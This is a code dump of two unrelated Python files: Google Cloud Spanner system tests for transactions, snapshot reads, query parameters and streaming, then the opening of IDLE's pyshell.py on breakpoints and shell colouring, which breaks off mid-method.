def test_batch_insert_then_read_all_datatypes(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.ALL_TYPES_TABLE, self.ALL)
batch.insert(
self.ALL_TYPES_TABLE,
self.ALL_TYPES_COLUMNS,
self.ALL_TYPES_ROWDATA)
snapshot = session.snapshot(read_timestamp=batch.committed)
rows = list(snapshot.read(
self.ALL_TYPES_TABLE, self.ALL_TYPES_COLUMNS, self.ALL))
self._check_row_data(rows, expected=self.ALL_TYPES_ROWDATA)
def test_batch_insert_or_update_then_query(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
snapshot = session.snapshot(read_timestamp=batch.committed)
rows = list(snapshot.execute_sql(self.SQL))
self._check_row_data(rows)
@RetryErrors(exception=GrpcRendezvous)
def test_transaction_read_and_insert_then_rollback(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
def _transaction_read_then_raise(self, transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(len(rows), 0)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
raise CustomException()
@RetryErrors(exception=GrpcRendezvous)
def test_transaction_read_and_insert_then_exception(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with self.assertRaises(CustomException):
session.run_in_transaction(self._transaction_read_then_raise)
# Transaction was rolled back.
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
@RetryErrors(exception=GrpcRendezvous)
def test_transaction_read_and_insert_or_update_then_commit(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert_or_update(
self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows)
def _transaction_concurrency_helper(self, unit_of_work, pkey):
INITIAL_VALUE = 123
NUM_THREADS = 3 # conforms to equivalent Java systest.
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.insert_or_update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, INITIAL_VALUE]])
# We don't want to run the threads' transactions in the current
# session, which would fail.
txn_sessions = []
for _ in range(NUM_THREADS):
txn_session = self._db.session()
txn_sessions.append(txn_session)
txn_session.create()
self.to_delete.append(txn_session)
threads = [
threading.Thread(
target=txn_session.run_in_transaction,
args=(unit_of_work, pkey))
for txn_session in txn_sessions]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
keyset = KeySet(keys=[(pkey,)])
rows = list(session.read(
COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
_, value = rows[0]
self.assertEqual(value, INITIAL_VALUE + len(threads))
def _read_w_concurrent_update(self, transaction, pkey):
keyset = KeySet(keys=[(pkey,)])
rows = list(transaction.read(
COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_read_w_concurrent_updates(self):
PKEY = 'read_w_concurrent_updates'
self._transaction_concurrency_helper(
self._read_w_concurrent_update, PKEY)
def _query_w_concurrent_update(self, transaction, pkey):
SQL = 'SELECT * FROM counters WHERE name = @name'
rows = list(transaction.execute_sql(
SQL,
params={'name': pkey},
param_types={'name': Type(code=STRING)},
))
self.assertEqual(len(rows), 1)
pkey, value = rows[0]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[pkey, value + 1]])
def test_transaction_query_w_concurrent_updates(self):
PKEY = 'query_w_concurrent_updates'
self._transaction_concurrency_helper(
self._query_w_concurrent_update, PKEY)
def test_transaction_read_w_abort(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
trigger = _ReadAbortTrigger()
with session.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
batch.insert(
COUNTERS_TABLE,
COUNTERS_COLUMNS,
[[trigger.KEY1, 0], [trigger.KEY2, 0]])
provoker = threading.Thread(
target=trigger.provoke_abort, args=(self._db,))
handler = threading.Thread(
target=trigger.handle_abort, args=(self._db,))
provoker.start()
trigger.provoker_started.wait()
handler.start()
trigger.handler_done.wait()
provoker.join()
handler.join()
rows = list(session.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self._check_row_data(
rows, expected=[[trigger.KEY1, 1], [trigger.KEY2, 1]])
@staticmethod
def _row_data(max_index):
for index in range(max_index):
yield [
index,
'First%09d' % (index,),
'Last%09d' % (max_index - index),
'test-%09d@example.com' % (index,),
]
def _set_up_table(self, row_count, db=None):
if db is None:
db = self._db
retry = RetryInstanceState(_has_all_ddl)
retry(db.reload)()
session = db.session()
session.create()
self.to_delete.append(session)
def _unit_of_work(transaction, test):
transaction.delete(test.TABLE, test.ALL)
transaction.insert(
test.TABLE, test.COLUMNS, test._row_data(row_count))
committed = session.run_in_transaction(_unit_of_work, test=self)
return session, committed
def test_snapshot_read_w_various_staleness(self):
from datetime import datetime
from google.cloud._helpers import UTC
ROW_COUNT = 400
session, committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
before_reads = datetime.utcnow().replace(tzinfo=UTC)
# Test w/ read timestamp
read_tx = session.snapshot(read_timestamp=committed)
rows = list(read_tx.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ min read timestamp
min_read_ts = session.snapshot(min_read_timestamp=committed)
rows = list(min_read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
staleness = datetime.utcnow().replace(tzinfo=UTC) - before_reads
# Test w/ max staleness
max_staleness = session.snapshot(max_staleness=staleness)
rows = list(max_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ exact staleness
exact_staleness = session.snapshot(exact_staleness=staleness)
rows = list(exact_staleness.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
# Test w/ strong
strong = session.snapshot()
rows = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(rows, all_data_rows)
def test_multiuse_snapshot_read_isolation_strong(self):
ROW_COUNT = 40
session, committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
strong = session.snapshot(multi_use=True)
before = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_read_timestamp(self):
ROW_COUNT = 40
session, committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
read_ts = session.snapshot(read_timestamp=committed, multi_use=True)
before = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(read_ts.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_multiuse_snapshot_read_isolation_exact_staleness(self):
ROW_COUNT = 40
session, committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
time.sleep(1)
delta = datetime.timedelta(microseconds=1000)
exact = session.snapshot(exact_staleness=delta, multi_use=True)
before = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(exact.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_row_data(after, all_data_rows)
def test_read_w_manual_consume(self):
ROW_COUNT = 4000
session, committed = self._set_up_table(ROW_COUNT)
snapshot = session.snapshot(read_timestamp=committed)
streamed = snapshot.read(self.TABLE, self.COLUMNS, self.ALL)
retrieved = 0
while True:
try:
streamed.consume_next()
except StopIteration:
break
retrieved += len(streamed.rows)
streamed.rows[:] = ()
self.assertEqual(retrieved, ROW_COUNT)
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
def test_read_w_index(self):
ROW_COUNT = 2000
# Indexed reads cannot return non-indexed columns
MY_COLUMNS = self.COLUMNS[0], self.COLUMNS[2]
EXTRA_DDL = [
'CREATE INDEX contacts_by_last_name ON contacts(last_name)',
]
pool = BurstyPool()
temp_db = Config.INSTANCE.database(
'test_read_w_index', ddl_statements=DDL_STATEMENTS + EXTRA_DDL,
pool=pool)
operation = temp_db.create()
self.to_delete.append(_DatabaseDropper(temp_db))
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
session, committed = self._set_up_table(ROW_COUNT, db=temp_db)
snapshot = session.snapshot(read_timestamp=committed)
rows = list(snapshot.read(
self.TABLE, MY_COLUMNS, self.ALL, index='contacts_by_last_name'))
expected = list(reversed(
[(row[0], row[2]) for row in self._row_data(ROW_COUNT)]))
self._check_row_data(rows, expected)
def test_read_w_single_key(self):
ROW_COUNT = 40
session, committed = self._set_up_table(ROW_COUNT)
snapshot = session.snapshot(read_timestamp=committed)
rows = list(snapshot.read(
self.TABLE, self.COLUMNS, KeySet(keys=[(0,)])))
all_data_rows = list(self._row_data(ROW_COUNT))
expected = [all_data_rows[0]]
self._check_row_data(rows, expected)
def test_read_w_multiple_keys(self):
ROW_COUNT = 40
indices = [0, 5, 17]
session, committed = self._set_up_table(ROW_COUNT)
snapshot = session.snapshot(read_timestamp=committed)
rows = list(snapshot.read(
self.TABLE, self.COLUMNS,
KeySet(keys=[(index,) for index in indices])))
all_data_rows = list(self._row_data(ROW_COUNT))
expected = [row for row in all_data_rows if row[0] in indices]
self._check_row_data(rows, expected)
def test_read_w_limit(self):
ROW_COUNT = 4000
LIMIT = 100
session, committed = self._set_up_table(ROW_COUNT)
snapshot = session.snapshot(read_timestamp=committed)
rows = list(snapshot.read(
self.TABLE, self.COLUMNS, self.ALL, limit=LIMIT))
all_data_rows = list(self._row_data(ROW_COUNT))
expected = all_data_rows[:LIMIT]
self._check_row_data(rows, expected)
def test_read_w_ranges(self):
ROW_COUNT = 4000
START = 1000
END = 2000
session, committed = self._set_up_table(ROW_COUNT)
snapshot = session.snapshot(read_timestamp=committed, multi_use=True)
all_data_rows = list(self._row_data(ROW_COUNT))
closed_closed = KeyRange(start_closed=[START], end_closed=[END])
keyset = KeySet(ranges=(closed_closed,))
rows = list(snapshot.read(
self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START:END+1]
self._check_row_data(rows, expected)
closed_open = KeyRange(start_closed=[START], end_open=[END])
keyset = KeySet(ranges=(closed_open,))
rows = list(snapshot.read(
self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START:END]
self._check_row_data(rows, expected)
open_open = KeyRange(start_open=[START], end_open=[END])
keyset = KeySet(ranges=(open_open,))
rows = list(snapshot.read(
self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START+1:END]
self._check_row_data(rows, expected)
open_closed = KeyRange(start_open=[START], end_closed=[END])
keyset = KeySet(ranges=(open_closed,))
rows = list(snapshot.read(
self.TABLE, self.COLUMNS, keyset))
expected = all_data_rows[START+1:END+1]
self._check_row_data(rows, expected)
def test_execute_sql_w_manual_consume(self):
ROW_COUNT = 4000
session, committed = self._set_up_table(ROW_COUNT)
snapshot = session.snapshot(read_timestamp=committed)
streamed = snapshot.execute_sql(self.SQL)
retrieved = 0
while True:
try:
streamed.consume_next()
except StopIteration:
break
retrieved += len(streamed.rows)
streamed.rows[:] = ()
self.assertEqual(retrieved, ROW_COUNT)
self.assertEqual(streamed._current_row, [])
self.assertEqual(streamed._pending_chunk, None)
def _check_sql_results(self, snapshot, sql, params, param_types, expected):
if 'ORDER' not in sql:
sql += ' ORDER BY eye_d'
rows = list(snapshot.execute_sql(
sql, params=params, param_types=param_types))
self._check_row_data(rows, expected=expected)
def test_multiuse_snapshot_execute_sql_isolation_strong(self):
ROW_COUNT = 40
SQL = 'SELECT * FROM {}'.format(self.TABLE)
session, committed = self._set_up_table(ROW_COUNT)
all_data_rows = list(self._row_data(ROW_COUNT))
strong = session.snapshot(multi_use=True)
before = list(strong.execute_sql(SQL))
self._check_row_data(before, all_data_rows)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
after = list(strong.execute_sql(SQL))
self._check_row_data(after, all_data_rows)
def test_execute_sql_returning_array_of_struct(self):
SQL = (
"SELECT ARRAY(SELECT AS STRUCT C1, C2 "
"FROM (SELECT 'a' AS C1, 1 AS C2 "
"UNION ALL SELECT 'b' AS C1, 2 AS C2) "
"ORDER BY C1 ASC)"
)
session = self._db.session()
session.create()
self.to_delete.append(session)
snapshot = session.snapshot()
self._check_sql_results(
snapshot,
sql=SQL,
params=None,
param_types=None,
expected=[
[[['a', 1], ['b', 2]]],
])
def test_execute_sql_w_query_param(self):
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.ALL_TYPES_TABLE, self.ALL)
batch.insert(
self.ALL_TYPES_TABLE,
self.ALL_TYPES_COLUMNS,
self.ALL_TYPES_ROWDATA)
snapshot = session.snapshot(
read_timestamp=batch.committed, multi_use=True)
# Cannot equality-test array values. See below for a test w/
# array of IDs.
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE are_you_sure = @sure',
params={'sure': True},
param_types={'sure': Type(code=BOOL)},
expected=[(19,), (99,)],
)
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE raw_data = @bytes_1',
params={'bytes_1': self.BYTES_1},
param_types={'bytes_1': Type(code=BYTES)},
expected=[(19,), (99,)],
)
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE hwhen = @hwhen',
params={'hwhen': self.SOME_DATE},
param_types={'hwhen': Type(code=DATE)},
expected=[(19,)],
)
self._check_sql_results(
snapshot,
sql=('SELECT eye_d FROM all_types WHERE approx_value >= @lower'
' AND approx_value < @upper '),
params={'lower': 0.0, 'upper': 1.0},
param_types={
'lower': Type(code=FLOAT64), 'upper': Type(code=FLOAT64)},
expected=[(None,), (19,)],
)
# Find +inf
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE approx_value = @pos_inf',
params={'pos_inf': float('+inf')},
param_types={'pos_inf': Type(code=FLOAT64)},
expected=[(107,)],
)
# Find -inf
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE approx_value = @neg_inf',
params={'neg_inf': float('-inf')},
param_types={'neg_inf': Type(code=FLOAT64)},
expected=[(207,)],
)
self._check_sql_results(
snapshot,
sql='SELECT description FROM all_types WHERE eye_d = @my_id',
params={'my_id': 19},
param_types={'my_id': Type(code=INT64)},
expected=[(u'dog',)],
)
self._check_sql_results(
snapshot,
sql='SELECT description FROM all_types WHERE eye_d = @my_id',
params={'my_id': None},
param_types={'my_id': Type(code=INT64)},
expected=[],
)
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE description = @description',
params={'description': u'dog'},
param_types={'description': Type(code=STRING)},
expected=[(19,)],
)
# NaNs cannot be searched for by equality.
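# (Background, not exercised here: IEEE-754 defines NaN != NaN, so an
# equality predicate can never match a NaN row; GoogleSQL-style dialects
# expose an IS_NAN() predicate for that purpose instead.)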
self._check_sql_results(
snapshot,
sql='SELECT eye_d FROM all_types WHERE exactly_hwhen = @hwhen',
params={'hwhen': self.SOME_TIME},
param_types={'hwhen': Type(code=TIMESTAMP)},
expected=[(19,)],
)
array_type = Type(code=ARRAY, array_element_type=Type(code=INT64))
self._check_sql_results(
snapshot,
sql=('SELECT description FROM all_types '
'WHERE eye_d in UNNEST(@my_list)'),
params={'my_list': [19, 99]},
param_types={'my_list': array_type},
expected=[(u'dog',), (u'cat',)],
)
class TestStreamingChunking(unittest.TestCase, _TestData):
@classmethod
def setUpClass(cls):
from tests.system.utils.streaming_utils import INSTANCE_NAME
from tests.system.utils.streaming_utils import DATABASE_NAME
instance = Config.CLIENT.instance(INSTANCE_NAME)
if not instance.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable.")
database = instance.database(DATABASE_NAME)
if not database.exists():
raise unittest.SkipTest(
"Run 'tests/system/utils/populate_streaming.py' to enable.")
cls._db = database
def _verify_one_column(self, table_desc):
sql = 'SELECT chunk_me FROM {}'.format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
def _verify_two_columns(self, table_desc):
sql = 'SELECT chunk_me, chunk_me_2 FROM {}'.format(table_desc.table)
with self._db.snapshot() as snapshot:
rows = list(snapshot.execute_sql(sql))
self.assertEqual(len(rows), table_desc.row_count)
expected = table_desc.value()
for row in rows:
self.assertEqual(row[0], expected)
self.assertEqual(row[1], expected)
def test_four_kay(self):
from tests.system.utils.streaming_utils import FOUR_KAY
self._verify_one_column(FOUR_KAY)
def test_forty_kay(self):
from tests.system.utils.streaming_utils import FORTY_KAY
self._verify_one_column(FORTY_KAY)
def test_four_hundred_kay(self):
from tests.system.utils.streaming_utils import FOUR_HUNDRED_KAY
self._verify_one_column(FOUR_HUNDRED_KAY)
def test_four_meg(self):
from tests.system.utils.streaming_utils import FOUR_MEG
self._verify_two_columns(FOUR_MEG)
class CustomException(Exception):
"""Placeholder for any user-defined exception."""
class _DatabaseDropper(object):
"""Helper for cleaning up databases created on-the-fly."""
def __init__(self, db):
self._db = db
def delete(self):
self._db.drop()
class _ReadAbortTrigger(object):
"""Helper for tests provoking abort-during-read."""
KEY1 = 'key1'
KEY2 = 'key2'
def __init__(self):
self.provoker_started = threading.Event()
self.provoker_done = threading.Event()
self.handler_running = threading.Event()
self.handler_done = threading.Event()
def _provoke_abort_unit_of_work(self, transaction):
keyset = KeySet(keys=[(self.KEY1,)])
rows = list(
transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset))
assert len(rows) == 1
row = rows[0]
value = row[1]
self.provoker_started.set()
self.handler_running.wait()
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY1, value + 1]])
def provoke_abort(self, database):
database.run_in_transaction(self._provoke_abort_unit_of_work)
self.provoker_done.set()
def _handle_abort_unit_of_work(self, transaction):
keyset_1 = KeySet(keys=[(self.KEY1,)])
rows_1 = list(
transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_1))
assert len(rows_1) == 1
row_1 = rows_1[0]
value_1 = row_1[1]
self.handler_running.set()
self.provoker_done.wait()
keyset_2 = KeySet(keys=[(self.KEY2,)])
rows_2 = list(
transaction.read(COUNTERS_TABLE, COUNTERS_COLUMNS, keyset_2))
assert len(rows_2) == 1
row_2 = rows_2[0]
value_2 = row_2[1]
transaction.update(
COUNTERS_TABLE, COUNTERS_COLUMNS, [[self.KEY2, value_1 + value_2]])
def handle_abort(self, database):
database.run_in_transaction(self._handle_abort_unit_of_work)
self.handler_done.set()
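# Commentary on the two units of work above: the handler reads KEY1, then
# blocks until the provoker commits an update to KEY1, so the handler's
# own commit aborts and run_in_transaction retries its whole unit of work.
# On retry it sees KEY1 == 1 and commits KEY2 = 1 + 0, which is exactly
# the [[KEY1, 1], [KEY2, 1]] expectation in test_transaction_read_w_abort.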
|
pyshell.py | #! /usr/bin/env python3
import sys
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
raise SystemExit(1)
import tkinter.messagebox as tkMessageBox
if TkVersion < 8.5:
root = Tk() # otherwise create root in main
root.withdraw()
tkMessageBox.showerror("Idle Cannot Start",
"Idle requires tcl/tk 8.5+, not %s." % TkVersion,
parent=root)
raise SystemExit(1)
from code import InteractiveInterpreter
import linecache
import os
import os.path
from platform import python_version
import re
import socket
import subprocess
import threading
import time
import tokenize
import warnings
from idlelib.colorizer import ColorDelegator
from idlelib.config import idleConf
from idlelib import debugger
from idlelib import debugger_r
from idlelib.editor import EditorWindow, fixwordbreaks
from idlelib.filelist import FileList
from idlelib.outwin import OutputWindow
from idlelib import rpc
from idlelib.run import idle_formatwarning, PseudoInputFile, PseudoOutputFile
from idlelib.undo import UndoDelegator
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the replacement of a None
file argument with warning_stream (which may itself be None), the
capture of the consequent AttributeError, and the output of a
hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, OSError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
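# Illustration of the save/restore round-trip (hypothetical cache entry;
# linecache stores (size, mtime, lines, fullname) tuples):
# linecache.cache['<pyshell#0>'] = (7, 0, ['x = 1\n'], '<pyshell#0>')
# linecache.checkcache() # patched: the '<pyshell#0>' entry survives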
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
except OSError:
lines = []
try:
with open(self.breakpointPath, "w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except OSError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
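# Example: ranges ('3.0', '5.0', '9.0', '10.0') -> [3, 4, 9]; each pair of
# indices delimits a half-open run of whole lines tagged "BREAK".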
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
